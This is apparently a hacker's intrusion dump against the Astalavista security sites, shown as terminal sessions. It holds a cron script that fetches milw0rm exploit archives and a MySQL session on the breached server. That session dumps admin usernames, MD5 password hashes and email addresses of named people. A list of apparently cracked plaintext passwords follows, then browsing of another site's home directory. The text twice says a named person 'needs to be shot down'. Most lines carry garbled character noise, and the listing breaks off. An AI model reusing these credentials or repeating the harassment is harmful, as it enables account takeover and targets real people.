<rss version=”2.0″>( k7 M! ?0 @2 m9 |/ D" k
<channel>
" g+ I9 h3 `4 d <title>ASTALAVISTA.com - Exploits</title>5 H* |1 h+ A( t2 n
<link>http://www.astalavista.com/exploits</link>
- r E1 j/ R; O5 W$ [1 ~ <description>All availably Exploits.</description>2 r) J8 L- k. r0 G4 v2 a& K6 s
<language>en-us</language>! z0 j X& F5 b t
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>$ q0 ~; g, I8 v& E. j) |% r1 ^
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
+ Z3 U4 e0 b3 t; k& y <generator>Astalavista.com</generator>. i, w" b; U' _
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
7 A3 h) P8 e5 N/ W# G% q: t5 x </channel>" s# z% o& {* l- M3 u& W
</rss>’;
4 d7 j2 w) s, O) d- G7 f. d3 \1 d3 T: @6 ]% S( R* F; h1 e4 Z
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
" G6 u4 y% W: m& r unlink (FULLPATH . ‘/feed/exploits.xml’);7 l* R& k, p$ c1 g: |
}
3 D; h1 S' h* j2 I5 o% K2 \, N
3 J/ A7 r6 H7 [7 K- h file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);( p+ P1 |+ c5 L1 G6 n, \0 u( e: Z
[snip]! L5 @4 k1 b8 `" [% {; V: I: }, F: C
7 e& g- {/ t' Q% y2 r
sh-3.2$ cat exploits.sh3 n- Q) ?' h5 @& o' w8 J
#!/bin/sh
8 v( E: n( @ g$ t+ D/ S0 v5 H, I: `/ O0 A
###########################################################
# w+ I9 M% t4 o# M# #
0 N8 v9 t6 k6 Y# Title: milw0rm exploits adder #
5 i5 l/ t/ b( c* N! B# f# Description: Add all milw0rm exploits to the #
. T$ L2 S9 e% O# Astalavista.com database #
/ m3 j7 _, _* y: \0 J+ v# #: R5 c$ F" k, q( B
# Company: Astalavista Group #8 I4 [+ z9 t v! n! t; k9 r
# Author: Paulo M. Santos ## `" `7 D7 x& y( x5 |: o( J
# E-Mail: 链接标记paulo.santos@astalavista.ch #6 w' q9 R/ t8 G6 L# \
# #: i* l7 E: O ~2 X$ R# N6 g4 N
###########################################################. H/ U& ^8 y+ a1 E" m( i
4 p3 F+ d0 E4 B) p
# path
) S* S2 ^2 V# kthis_path=/home/com/public_html/modifications/cronjobs
: k5 A. G5 a" i1 k/ l& J2 ], ^
# change directory
+ K9 Q& J1 B1 I5 Q5 j- a. {cd $this_path
; J& J8 f# L( Y% scd tmp/7 G7 r% B4 x N7 i5 j# G' G$ l# y
8 E# I: C! z ]: m% g- E9 t4 R; T# delete files
8 X* t, r% Z9 O- t% Brm -rf milw0rm.tar.* &
5 C! Q: j+ G5 J3 i" _; U9 mrm -rf milw0rm/ &/ q: g' S( c/ J F8 i+ \9 e
8 ]( g% |: h9 n, M& Q* Z2 ?) M
# wget milw0rm paket9 h+ F3 n7 d1 Z1 i* H
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
' h+ w: N, n& r* M g4 L5 k
1 z: k3 k/ b) T7 m7 [. b8 r# extract milw0rm paket& L! d7 `+ ^3 E! v: z" T1 K3 N" r
tar -xvf milw0rm.tar.bz2: ^' N3 v' |; D9 C' a
/ d$ K/ d9 y6 F0 d* P
# change owner4 y' r/ ^* `9 `5 m
chown -R com .
* d* ^- \/ P9 U# @: uchgrp -R com ., t g; z I; c* }6 Y
& r9 [1 ~, y8 D; P4 s! H5 \# execute php script8 g& O( B# \- ~7 j/ j
cd $this_path
5 w' s! D4 w" i5 c7 D& Cphp -q exploits.php6 p# S; q x& \" A! Z1 y+ j
' r' x2 x& P" d" Z1 L& J
# delete files
, Q5 ~4 B. p$ d% P2 g9 g. ^rm -rf tmp/milw0rm.tar.*
! R Y9 f' G; i0 ?" Nrm -rf tmp/milw0rm/# e' T/ N: n4 E6 B
1 u* k5 i- s- T. ~% x- ]
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”, z, V- W, Y* x- K0 a
Paulo M. Santos needs to be shot down.
6 x5 b8 n) ]; ^- {& l( L$ Y6 X/ n3 T+ u- V, N
mysql -u contrexxuser2 -p
8 ?' R& \% _* t* G# ]( WEnter password:3 C# c$ C i0 Z3 N. A/ |8 T
Welcome to the MySQL monitor. Commands end with ; or \g.( O6 [+ z: W% F, T. S3 i5 A
Your MySQL connection id is 261694 K5 H T" |" o5 D
Server version: 5.0.45-community-log MySQL Community Edition (GPL); \- }4 Q0 j, ?" Z N& B- }8 u
9 [0 W- `0 T8 c! I* |, ~Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.7 I" a$ f: N8 t }
, r A+ D7 e1 D8 d! gmysql> show databases;- |' t& a+ }( t7 p- T0 }2 p
+——————–+
' I" o& z; h. F7 o, I3 i8 \| Database |5 `* E7 K }9 G) l* Y: O
+——————–+
, `2 F' R: C" M1 O6 l| information_schema |; p: h4 u% ]/ |1 c v! k" V( k3 {
| com_contrexx2 |# B1 u; p5 Y& ?
| com_contrexx2_live | c! j' K R9 ^5 g3 R" C4 E* T; V0 q8 T) o
| test |+ w+ e/ j4 K8 |4 |- h4 G
+——————–+; B# ^1 `8 c7 s
4 rows in set (0.00 sec)
: v3 K: t) [) {3 M" O$ r! B* o y3 G% k+ I) p) a
mysql> use com_contrexx2_live
# k3 y# L2 C1 ~$ ^& l; hDatabase changed
f: _/ F4 \# g$ dmysql> show tables;
1 x( R; m+ c4 u+————————————————–+9 ?: {$ `3 @* J; {! q' d' I
| Tables_in_com_contrexx2_live |! L* c9 J' Q6 k) _" y" ~- I: L
+————————————————–+1 \* v- M4 K' E
| cc_banner_counter |
! r. d$ C& S! Z( f4 y' {| cc_search_counter |
" T. i/ q U2 g' r# q h| contrexx_access_group_dynamic_ids |+ Q) s: f- w3 E2 j
| contrexx_access_group_static_ids |
7 g! N x9 `% o0 w" J( E| contrexx_access_rel_user_group |. v( d; F5 M( f, J$ Z4 \0 m: x
| contrexx_access_settings |: n: Y+ Z( J$ B$ p
| contrexx_access_user_attribute |# V; v3 U: n$ k. w6 E T
| contrexx_access_user_attribute_name |
/ Z2 k# O; j9 m| contrexx_access_user_attribute_value |
8 z# B5 O# r9 P| contrexx_access_user_core_attribute |
% W5 E5 R# U" ]* C5 s| contrexx_access_user_groups |9 L3 E2 P0 g' |6 w
| contrexx_access_user_mail |
7 }2 z; l* j- j. ~6 M| contrexx_access_user_profile |
; W% _* ~$ \; p! ]( U( V| contrexx_access_user_title |
7 M8 {% r, }7 [, D; F D M* c| contrexx_access_user_validity |$ e$ Q9 [2 h5 |
| contrexx_access_users |( q4 {. i+ y& @+ x+ z; x
| contrexx_backend_areas |
* o, B0 H. ?7 b. t* [| contrexx_backups |6 U$ M2 `! h; a0 J$ }. q9 i
| contrexx_content |
/ g. I i5 O2 g| contrexx_content_history |# Y$ U( a5 K/ ^
| contrexx_content_logfile |
" r$ Q0 P6 J; o| contrexx_content_navigation |/ M% {* _' |! {: c
| contrexx_content_navigation_history |
* [9 g/ v/ w& H2 b1 S| contrexx_ids |
$ l9 }: I& n. w| contrexx_languages |
& ?% [( X4 W; `4 c3 ]0 h3 l| contrexx_lib_country |
: Q5 F* E' t5 s; @: I' S6 w6 o| contrexx_log |
6 D6 m& L% g5 ^- Y/ w| contrexx_module_alias_source |
, Z' i4 r( O. n# } J6 g8 h. \3 q| contrexx_module_alias_target |# E9 [4 B# t3 ^) _5 ?/ o( Q, b
| contrexx_module_block_blocks |; Z- @# Z* K* L1 f9 e9 |7 ?4 n
| contrexx_module_block_rel_lang |
0 r5 B9 G# h/ B| contrexx_module_block_rel_pages |, W$ S4 ?$ I. M. h
| contrexx_module_block_settings |
/ n0 n* X h7 f t' u| contrexx_module_blog_categories |' ?6 q/ Q0 x, M7 A* T% |) z
| contrexx_module_blog_comments |# f- Y" @2 x+ K* {$ F+ I
| contrexx_module_blog_message_to_category |
( u2 c+ v; l! P1 B7 | F| contrexx_module_blog_messages |0 |! N8 ]3 t7 D& T, U- [
| contrexx_module_blog_messages_lang |/ Q( }6 W2 H, K, N, `! M: K
| contrexx_module_blog_networks |; b3 b- b: R8 E
| contrexx_module_blog_networks_lang |
* `2 `% [6 W+ w$ W| contrexx_module_blog_settings |5 P4 e2 u0 o" K& Z
| contrexx_module_blog_votes |
" [% @2 d' q7 I9 [$ F| contrexx_module_calendar |' y$ Q* F& m' c- i2 c" ^
| contrexx_module_calendar_access |
# h) n8 g' ]' d& w( W# w| contrexx_module_calendar_categories |) E4 ]1 u1 e7 h7 x. E7 _# [
| contrexx_module_calendar_form_data |$ h, u8 l) \( W7 {$ C
| contrexx_module_calendar_form_fields |
) F7 c6 g) ?; b9 D| contrexx_module_calendar_registrations |
- P1 A" l$ B( ?' _0 g| contrexx_module_calendar_settings |4 F6 v4 z4 o; U7 i6 H" k( S
| contrexx_module_calendar_style |
, Q3 ]9 R7 w1 X6 w| contrexx_module_contact_form |
! {- y: o6 N, G9 A; Y2 F) {/ s| contrexx_module_contact_form_data |5 E6 S- B# s: y% y3 Z/ ?
| contrexx_module_contact_form_field |
6 P8 F; ^4 \+ `$ {, o" g| contrexx_module_contact_settings |2 a8 \ ^8 u; n) @: W
| contrexx_module_data_categories |6 x2 q: D7 a8 _
| contrexx_module_data_message_to_category |! N! a1 q) R& W7 t
| contrexx_module_data_messages |; M1 F! Y3 i3 n& L$ I
| contrexx_module_data_messages_lang |
& c# \* p/ f! D4 \* [* J| contrexx_module_data_placeholders |
: u( A9 B3 n& V- z8 C% e/ a| contrexx_module_data_settings |
# P; Y+ X9 T3 T- Q' s" x! O| contrexx_module_directory_access |1 b& C6 I; N7 g% `
| contrexx_module_directory_categories |
+ _6 d5 h% X. i; u: L| contrexx_module_directory_dir |
3 y! ~% p# a: m8 f. T) l+ N| contrexx_module_directory_inputfields |
: H8 F/ l# A+ k4 w6 f/ J$ N6 w| contrexx_module_directory_levels |1 w5 e( x7 E- v; b
| contrexx_module_directory_mail |8 r8 F" [ y& N" U2 B7 u4 `& {
| contrexx_module_directory_rel_dir_cat |
$ f: V+ n5 X. U( \; t4 W3 t| contrexx_module_directory_rel_dir_level |* @# B, @8 b; ~
| contrexx_module_directory_settings |! x4 k) F9 W# I: b/ q$ v5 `2 e
| contrexx_module_directory_settings_google |
/ l+ }. y- c9 f| contrexx_module_directory_vote |
7 f7 h! {2 X% T3 H3 V. b! h| contrexx_module_docsys | J) q( s9 @4 P( }4 Y8 r/ ?5 |
| contrexx_module_docsys_categories |8 z. F# `3 l+ l v
| contrexx_module_egov_configuration |
% Y2 S# L5 Q* o0 Q0 i. H| contrexx_module_egov_orders |( e) ?5 L2 t/ T8 h, X
| contrexx_module_egov_product_calendar |0 ~6 r6 @* q% Y* J
| contrexx_module_egov_product_fields |
0 A3 @3 Z7 b6 V/ {6 z# t' l| contrexx_module_egov_products |
4 x* h& y# `9 p9 B- J+ ?| contrexx_module_egov_settings |& J* A$ i# Z3 z! i. S9 B
| contrexx_module_exploits |
; Z# M! n$ F" _: G5 i| contrexx_module_exploits_categories |4 \0 c( {( _4 @5 P/ `* L2 H
| contrexx_module_feed_category |
' l9 P. `/ b, b* c% X| contrexx_module_feed_news |
8 U6 `: R9 v" G" h' ]# J# d( O| contrexx_module_feed_newsml_association |
% z4 t; B2 P# k `| contrexx_module_feed_newsml_categories |& B) p- l# O' W/ K- |
| contrexx_module_feed_newsml_documents |" g2 _& `; e) ~* ]: q( ^- r
| contrexx_module_feed_newsml_providers |
% h2 \+ H& ~- t1 A& L7 {| contrexx_module_forum_access |
0 M6 T# B T4 d% V. s| contrexx_module_forum_categories |$ u3 H* X0 x+ T' K& |8 [, T
| contrexx_module_forum_categories_lang |: u5 w1 E2 a& B) A* S0 }
| contrexx_module_forum_notification |
* i+ _& I n( @' C' F! _| contrexx_module_forum_postings |
; B! V' I& E( T8 ^. N! ]( s( `* A7 || contrexx_module_forum_rating |1 {( R9 c/ U0 y" t
| contrexx_module_forum_settings |
9 D4 d7 O2 B1 \* Q& ^ \+ j$ b% v: B% [| contrexx_module_forum_statistics |5 V) M/ f2 ~ `4 r6 h y1 e
| contrexx_module_gallery_categories |
( O, r+ ~, `7 g. o- u| contrexx_module_gallery_comments |
6 O! p8 Z2 J0 O# P* C* t$ Y( c| contrexx_module_gallery_language |$ z% G7 x8 p) \$ y
| contrexx_module_gallery_language_pics |
# w. d ?+ s1 q# r. o$ L5 b) V| contrexx_module_gallery_pictures |$ l- Z6 Y4 D/ p8 U$ {9 n2 p
| contrexx_module_gallery_settings |) B% S. l8 U( N; m9 m4 k
| contrexx_module_gallery_votes |
( x8 ~* T1 F- k* i2 {' `| contrexx_module_guestbook |: a, B, N x; L' j
| contrexx_module_guestbook_settings |) X1 z7 P& n8 G4 o ^; e$ ~
| contrexx_module_livecam |& f7 B: R$ ^) C, {/ @7 D
| contrexx_module_livecam_settings |
: R+ C% i! ^2 c7 A% X| contrexx_module_market |9 A- z8 u/ o+ S6 x* B& r7 b
| contrexx_module_market_access |$ G/ h/ Q. O! w3 O- P7 i
| contrexx_module_market_categories |; \9 r' U: R, q
| contrexx_module_market_mail |
+ N1 n4 U$ T$ o1 u| contrexx_module_market_paypal |, g9 D' o! l* {
| contrexx_module_market_settings |/ u) x4 n0 v# t5 M2 _& s
| contrexx_module_market_spez_fields |0 s; Y: M8 Z8 i3 w7 L1 `. J7 _
| contrexx_module_mediadir_access |8 C. U* e" Q9 |6 N, h7 T; j
| contrexx_module_mediadir_categories |5 `, I2 i. D2 k6 x# }+ J) M3 k
| contrexx_module_mediadir_comments |$ L6 I# J- u; Z' L* \
| contrexx_module_mediadir_dir |
5 Q6 z( n$ l% |% j# i/ T2 ~- N| contrexx_module_mediadir_inputfields |8 Z0 I9 S W8 Z1 i( O6 Y2 S7 S& D
| contrexx_module_mediadir_levels |, h5 v: @8 ?6 N! ]; j
| contrexx_module_mediadir_mail |
( q; M* L) \2 _" n| contrexx_module_mediadir_rel_dir_cat |; j, e# p" q7 E6 |2 G" S1 T8 {
| contrexx_module_mediadir_rel_dir_level |
" v( E1 U4 `9 E, Y0 C| contrexx_module_mediadir_reports |; f; P( X1 g" g/ U# I$ K+ V2 N
| contrexx_module_mediadir_settings |* @+ S) c3 [8 o) M
| contrexx_module_mediadir_settings_google |$ [3 Z$ g# V6 B# Z3 i8 V
| contrexx_module_mediadir_vote |
& d9 R, I0 S0 z4 n9 p) x| contrexx_module_memberdir_directories |& M- R2 ?% }' w# s
| contrexx_module_memberdir_name |
) O1 D+ S% K( Z| contrexx_module_memberdir_settings |% b& R( T: F4 p+ ?
| contrexx_module_memberdir_values |
' E, g) A4 e* W% L! c& D9 ~$ b| contrexx_module_nettools_allowed_groups |( K! |0 K& U- {2 @
| contrexx_module_nettools_settings |5 X) a% z, v' f: L* K
| contrexx_module_news |3 o' N6 V5 X& o
| contrexx_module_news_access |
( e% H7 r8 c+ A; W! }" G3 v. M$ _| contrexx_module_news_categories |+ L5 F& Z- X0 X
| contrexx_module_news_settings |* U7 Z- Y* ]) M: N& W
| contrexx_module_news_teaser_frame |( P4 L5 b& ]9 \
| contrexx_module_news_teaser_frame_templates |
) F0 h" s6 ?7 T/ q/ _2 U$ v| contrexx_module_news_ticker |
5 l' \6 m; n' a5 z8 l k0 G: C; F| contrexx_module_newsletter |' f f; e3 @9 S0 Z7 ]
| contrexx_module_newsletter_attachment |, I7 |" u" A' @7 ^' M/ y' W* S
| contrexx_module_newsletter_category |
) W- y5 a0 c2 P| contrexx_module_newsletter_confirm_mail | t& p3 A+ n- R) j% |
| contrexx_module_newsletter_rel_cat_news |1 t7 t3 m5 x. ]& l$ J
| contrexx_module_newsletter_rel_user_cat |" a* a+ y R) D8 W7 c
| contrexx_module_newsletter_settings |" d. q: y$ |6 Y Y3 S. N8 W0 A
| contrexx_module_newsletter_template |
4 k* n' b( I' q6 |3 f5 Y| contrexx_module_newsletter_tmp_sending |
0 X% a! L* g X4 S6 m/ k$ l3 n| contrexx_module_newsletter_user |
+ j6 c! _1 x" z| contrexx_module_newsletter_user_title |
4 U6 X3 R* F9 {# q F8 G| contrexx_module_onlinetools_defaultports |
) j1 |" V6 L# H6 |. u| contrexx_module_onlinetools_defaultports_back |0 P$ {% T; X8 S3 S
| contrexx_module_onlinetools_geolitecity_blocks |+ l8 o( D# L I& ^* Y1 U
| contrexx_module_onlinetools_geolitecity_country |
, u4 n- |8 o, Y) L0 k' \| contrexx_module_onlinetools_geolitecity_location |
+ q- v- F2 R0 W* x$ D% X' j8 Y| contrexx_module_podcast_category |% C, [4 E, X! Y/ r
| contrexx_module_podcast_medium |% J+ V' h/ B5 `9 B7 e
| contrexx_module_podcast_rel_category_lang |* ?7 `% v& ?* k, s
| contrexx_module_podcast_rel_medium_category | p+ y5 u1 d6 x" Y! z
| contrexx_module_podcast_settings |1 r7 r, ~' t" ^$ ?$ X
| contrexx_module_podcast_template |" K o) V+ o+ q5 q* {/ B4 s
| contrexx_module_proxydb |
: O3 K- j, X6 T! S8 x| contrexx_module_recommend |
" @% \: x, ^0 U! H( n7 o$ B: }; ]: Z| contrexx_module_repository |
' R5 {+ o7 X( C2 ^0 @- j| contrexx_module_securitynews_cats |
( X& q. `- o3 W! m1 `| contrexx_module_securitynews_feeds |' g7 l7 {/ l; F `% s
| contrexx_module_securitynews_news |1 ^$ i) q0 C: e- i6 N; W8 Z
| contrexx_module_shop_categories |
" D/ |& m7 B# I1 N| contrexx_module_shop_config |
+ N2 F: s) ~1 p2 N5 ?% h0 k| contrexx_module_shop_countries |" ^: W) M3 n9 U2 `. ~% X* h4 s
| contrexx_module_shop_currencies |9 b% D1 D2 e! T7 T! h" C. E8 J
| contrexx_module_shop_customers |
6 S7 ~1 k. I9 R* @9 q0 z, n| contrexx_module_shop_importimg |
' A9 v& }9 t- `+ B. V, |! f| contrexx_module_shop_lsv |
7 u2 p1 \+ o' U, T& t+ N| contrexx_module_shop_mail |: d* u" W! g) ?+ f8 \2 q" @
| contrexx_module_shop_mail_content |
5 c* v% L* A2 }: T# O| contrexx_module_shop_manufacturer |
, H) \6 Y ~ I' y# U# t1 {. ]| contrexx_module_shop_order_items |
* Y* m5 w4 C, {6 w! i3 f| contrexx_module_shop_order_items_attributes |9 k+ p: ? [& k& ]
| contrexx_module_shop_orders |
# h; A, o K0 w| contrexx_module_shop_payment |
7 P Q. C) o0 c0 {, P5 W| contrexx_module_shop_payment_processors |" X- ~0 W# h, f2 k2 w
| contrexx_module_shop_pricelists |1 T" s$ I8 |* D( p
| contrexx_module_shop_products |
. [% F( D/ R0 o& _| contrexx_module_shop_products_attributes |
! ?- H* ~/ d9 n4 }| contrexx_module_shop_products_attributes_name |
# l3 ?- o6 r: t! X" I6 c+ `| contrexx_module_shop_products_attributes_value | I5 I/ ^& r+ J E
| contrexx_module_shop_products_downloads |! y) Y O M% F. B" c7 F
| contrexx_module_shop_rel_countries |- T$ o4 k& i, x+ p1 f1 D0 v
| contrexx_module_shop_rel_payment |
0 g( c# u7 u% y| contrexx_module_shop_rel_shipment |) [( u$ S9 Q6 l
| contrexx_module_shop_shipment_cost |" v \* n7 D9 Q, r5 A
| contrexx_module_shop_shipper |
% H- ?5 |3 p% W& V5 a| contrexx_module_shop_vat | Y, Z* ^; e1 b! S0 u
| contrexx_module_shop_zones |* }. d# l0 @3 S" m9 l# j( d% @
| contrexx_module_u2u_address_list |+ q) S- K" [5 N
| contrexx_module_u2u_message_log |
" r& p9 g" A5 C6 K, W# F4 Y6 g% I8 y2 w| contrexx_module_u2u_sent_messages |
3 `+ }! ^% P7 E# f# s: ]1 `) S8 l| contrexx_module_u2u_settings |
1 H, T- _6 t! [- |1 J: F( b f| contrexx_module_u2u_user_log |
% {: Q) S" x( u, l% ~/ V: L; f: Q4 R| contrexx_modules |: h( M. q4 T# r
| contrexx_sessions |
0 ]8 Y7 A3 `$ l| contrexx_settings |! E8 V( v q& l7 l1 t
| contrexx_settings_smtp |4 u8 d* V( [$ O x
| contrexx_skins |: {: g, H8 c' S: Y& d% \ }
| contrexx_stats_browser |
, n6 B: M0 N4 z* g0 R' M| contrexx_stats_colourdepth |4 l9 @& d8 V$ m. Z% c: J( p
| contrexx_stats_config |
. e. t: O4 N6 j1 R! r! y| contrexx_stats_country |
9 o3 Y1 W. e6 j/ ?; J& z| contrexx_stats_hostname |( V" u) \, m7 p, B; q/ K, s
| contrexx_stats_javascript |
* m5 z/ I/ p D0 y# c+ f4 L# O2 i| contrexx_stats_operatingsystem |" Z1 U$ J7 p- ]* p7 R6 q& B
| contrexx_stats_referer |
! `- p+ ]+ D. d- j1 y+ V+ M. W| contrexx_stats_requests |
; p4 A, q! Q7 q* |( C| contrexx_stats_requests_summary |' e! N) l( B Z ^ E9 C
| contrexx_stats_screenresolution |
4 ~7 `; L- a5 a/ D Q7 {& `' Q% `" ]| contrexx_stats_search |; N# ?1 h {5 Z5 @! a
| contrexx_stats_spiders |7 ^" M8 A/ ]4 I" b3 F
| contrexx_stats_spiders_summary |
' I6 ?1 u g/ J0 Q' ^2 O| contrexx_stats_visitors |
. `: ]6 F: X9 Q* L1 i| contrexx_stats_visitors_summary |) }; [6 t T5 F; |* D+ H/ }. C" h* t
| contrexx_voting_additionaldata |0 v& o: {( _( G/ N! A. a
| contrexx_voting_email |0 k2 u3 t. q" x- F+ a! `
| contrexx_voting_rel_email_system |6 b7 ?0 d3 X4 Z& E; \9 `) M4 H
| contrexx_voting_results |
0 b+ D: ~; a& ^# ^8 h# B* L| contrexx_voting_system |
" b. ~5 i2 P: T: t| foo |
0 H; e6 g* h; O/ J S+————————————————–+
" c+ S+ s( X" A3 j. B1 J0 f227 rows in set (0.01 sec)) h i3 J: j# h3 V" Q" w
" H+ z9 d" z! s# }
mysql> select count(*) as skids from contrexx_access_users;& C6 f5 w/ f5 [5 U! `
+——-+8 V6 n* |% C0 M7 n( h+ C( F
| skids |0 B2 N n; y7 R) u
+——-+# M4 D( I! Z, a+ f( k& b& z
| 53699 |$ x3 a, {. q z( V) o: E2 g
+——-+6 c( o6 |6 U5 I
1 row in set (0.00 sec)1 h$ v" n" e! \
* H- z6 W* y7 c! r
mysql> describe contrexx_access_users;
. {7 Y" X6 s+ c4 F- D9 K u+——————+——————————————+——+—–+————–+—————-+2 G1 H8 G+ m' r6 j
| Field | Type | Null | Key | Default | Extra |5 E; e( L. Z0 r9 g) H) b2 _, T
+——————+——————————————+——+—–+————–+—————-+
6 l/ B" C7 F! I. F" g7 [| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
* z* P. }9 ~5 r) K+ r5 y| is_admin | tinyint(1) unsigned | NO | | 0 | |
/ u& B" \! ]% u0 ]' A% T| username | varchar(40) | YES | MUL | NULL | |
! r0 [5 n. h+ m4 J e, m# ]| password | varchar(32) | YES | | NULL | |* v- ]" t, i3 V* m. L' Q* [" Z
| regdate | int(14) unsigned | NO | | 0 | |: q6 J% [# n) f: d; x3 O o; I
| expiration | int(14) unsigned | NO | | 0 | |
9 ]3 T$ C8 }/ ]) X6 G| validity | int(10) unsigned | NO | | 0 | |" W |4 O* ?* r# S
| last_auth | int(14) unsigned | NO | | 0 | | ~" W: o8 \6 h. z. O9 \& a$ f$ X
| last_activity | int(14) unsigned | NO | | 0 | |
M* n( ]" W( o$ q| email | varchar(255) | YES | | NULL | |
1 W9 V3 A4 L S t- I5 J3 X7 p| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |. h# }8 Y1 B& j$ q0 @9 a
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
* o2 r( ~" ^- R6 U! h3 V2 N| backend_lang_id | int(2) unsigned | NO | | 0 | |0 P- a; {/ q9 W* l8 i. E' Y- `" S
| active | tinyint(1) | NO | | 0 | |9 }$ l5 z9 }' v6 M# i! Z V
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |( F8 T9 k9 w8 o/ _: K
| restore_key | varchar(32) | NO | | | |* S2 A5 R: A$ ]* j1 y- ?% i% ?
| restore_key_time | int(14) unsigned | NO | | 0 | |
6 V4 B$ K9 N8 o, K% L| u2u_active | enum(’0′,’1′) | NO | | 1 | |* h% k$ F0 w: ]5 T
+——————+——————————————+——+—–+————–+—————-+
8 m# G# f/ e; \6 ?4 o: P) G. e18 rows in set (0.00 sec)
% S+ _4 c7 p4 }- U/ {. S
4 e6 n* k& j/ A! j+ d3 zmysql> select username,password,email from contrexx_access_users where is_admin = 1;" S+ K! {- B, ?+ Y+ Q6 m! o
+————+———————————-+—————————–+2 R7 U6 k5 R# a0 ^8 }: P: j% }
| username | password | email |' R4 C9 L4 e- [2 b. E
+————+———————————-+—————————–++ ~$ c, M% y% h! P
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
2 A$ P# m0 Z# r* J) q7 } W| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |" B) X! C& |0 z$ |3 E
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
7 \" U/ g4 P/ E| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
" i( g5 R: ~+ T X. f% O7 ~$ O+————+———————————-+—————————–+ k: D8 {5 }. K' b% }7 o
4 rows in set (0.04 sec)- N8 h& B( J7 ]( f6 d7 ^0 ]
; E. r! l# H- z) n; Q* |, f' c/ Lmysql> exit;
4 V6 x# l. V" M9 x4 p4 c+ YBye* u9 X5 N+ O' n% e6 e5 V+ L, @
2 T$ ~" ]6 T3 x& y3 d t3 B3 \
[~] There you go, your “team of security and IT professionals” is a joke.
6 K- b) Y* K, P- d7 Q- r/ R8 ~8 ~/ [: a/ ]5 r* h8 X% q1 H# ?
+——————————+
* P2 k8 Z8 H: }1 ]$ C I: ksystem:f82BN3+_*
- u @+ U0 P0 i% \Be1er0ph0r:belerophor4astacom
" O, R, U0 @1 wprozac:asta4cms!
6 n' ^0 t7 ?, icommander:mpbdaagf6m* K% {. m- Y8 Z$ T
sykadul:ak29eral, y2 C7 O: U0 F" |3 T6 O& p
+——————————+, I" Y% m1 N: n2 _. T! [6 o4 C
+ i7 C* u- ^8 N) r. n4 E[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)3 K3 k- f+ k% j
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
- l1 c5 \: E- n/ x* f* D. w' z' `5 N' @
[~] Lets move to astalavista.net now,# m) w& }: {1 A! g3 F
+ n5 l4 u$ z( O; Q
From <链接标记[url]https://www.astalavista.net/[/url]>:; y3 [* z. n: B7 K) d7 n) Q7 H' ]
>> Everyone knows that the best defense is a good offense.
2 h, T' l& d- U2 `$ _>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
S6 s; H" E' @0 Q>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.! h( k/ e* q- y5 N4 N
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
2 g1 M2 j1 C3 D' o& Y; g: v. k \* D) r# O. m3 p8 A
>> Go ahead, try and hack our server . in a completely legal way!
) F, b5 x$ i7 p$ A5 ^( t5 x>> Learn by doing: We offer our members tricky tasks and challenges on an* Z6 v9 p' h9 P( U+ Z$ [
>> ongoing basis so you can test your knowledge and abilities. You can also$ `- y/ F' b* t' D6 B" ~
>> demonstrate what you.ve mastered by taking part in regular hacker contests
! s7 ^. ?: l' i& z0 V* R7 t>> and war games
# i# A/ J- ?# C: P9 B) m$ F6 i/ e5 Z2 I7 e3 F
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!* a! x$ O6 f) O3 G, i1 {
! E/ c# S$ a! T* d[-] Tricky task: Find home dir of astalavista.net2 T w2 V' I$ x" y: y
" V% ^& U$ j$ V. gsh-3.2$ ls -la ~astanet
) o8 C/ S4 v1 ctotal 48) r% p: g3 E- ?
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
/ I1 j! e* N6 F7 k) L4 g/ adrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..1 v% D% f& c- c4 l* m b
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth& U0 ^1 t5 a6 W7 q
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
0 A! _( d8 M8 q9 `0 T-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout. j( q. F0 ?; c
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
. Z9 Q3 N+ _- B& `-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc0 j! X4 S/ W K
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
/ v/ O6 U% v$ m" ~, p7 p7 idrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap: n. \) w! s5 J* J- _
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail1 D: S1 K6 V* e6 U5 h& r* N/ C- v
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html- }! c# H9 |& Y- ]
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow" \# q; v3 A; R0 M
7 h0 i; @' V3 I# `/ Fsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/- S8 H0 B! Z& @/ j; h, `
sh-3.2$ ls -la
" G4 m$ b3 `4 r' o( V Ptotal 200
9 |, R( d j* d/ R9 A% ndrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .) m9 g/ c, L, G: z9 z
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
